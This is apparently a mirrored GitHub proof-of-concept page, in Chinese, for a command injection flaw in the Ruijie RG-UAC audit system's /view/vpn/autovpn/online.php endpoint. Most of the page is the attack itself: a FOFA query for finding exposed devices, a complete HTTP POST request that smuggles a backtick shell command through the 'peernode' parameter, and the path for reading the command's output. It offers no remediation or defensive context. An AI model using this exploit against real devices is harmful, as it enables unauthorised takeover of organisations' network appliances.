mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-07-29 14:04:06 +00:00
49 lines
1.2 KiB
Markdown
49 lines
1.2 KiB
Markdown
![]() |
## 锐捷RG-UAC统一上网行为管理审计系统online.php存在远程代码执行
|
|||
|
|
|||
|
锐捷RG-UAC中存在命令执行漏洞,应用程序管理网关后端 /view/vpn/autovpn/online.php接口。攻击者可以执行任意命令来控制服务器权限。
|
|||
|
|
|||
|
## fofa
|
|||
|
|
|||
|
```
|
|||
|
app="Ruijie-RG-UAC"
|
|||
|
```
|
|||
|
|
|||
|
## poc
|
|||
|
|
|||
|
```
|
|||
|
POST /view/vpn/autovpn/online.php HTTP/1.1
|
|||
|
Host: XXXXXXX:1443
|
|||
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)
|
|||
|
Gecko/20100101 Firefox/124.0
|
|||
|
Accept:
|
|||
|
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*
|
|||
|
;q=0.8
|
|||
|
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
|||
|
Accept-Encoding: gzip, deflate
|
|||
|
Origin: http://XXXXXXX:280
|
|||
|
Sec-GPC: 1
|
|||
|
Connection: close
|
|||
|
Referer: http://XXXXXXXXX:280/view/fireWall/PreDOSattack/list.php
|
|||
|
Cookie: PHPSESSID=ebd507c9bc5a4293c3e5e596f37157bf
|
|||
|
Upgrade-Insecure-Requests: 1
|
|||
|
X-Forwarded-For: 0000:0000:0000::0000
|
|||
|
X-Originating-IP: 0000:0000:0000::0000
|
|||
|
X-Remote-IP: 0000:0000:0000::0000
|
|||
|
X-Remote-Addr: 0000:0000:0000::0000
|
|||
|
Content-Type: application/x-www-form-urlencoded
|
|||
|
Content-Length: 20
|
|||
|
|
|||
|
peernode=`id+>1.txt`
|
|||
|
```
|
|||
|
|
|||
|

|
|||
|
|
|||
|
|
|||
|
|
|||
|
文件路径
|
|||
|
|
|||
|
```
|
|||
|
/view/vpn/autovpn/1.txt
|
|||
|
```
|
|||
|
|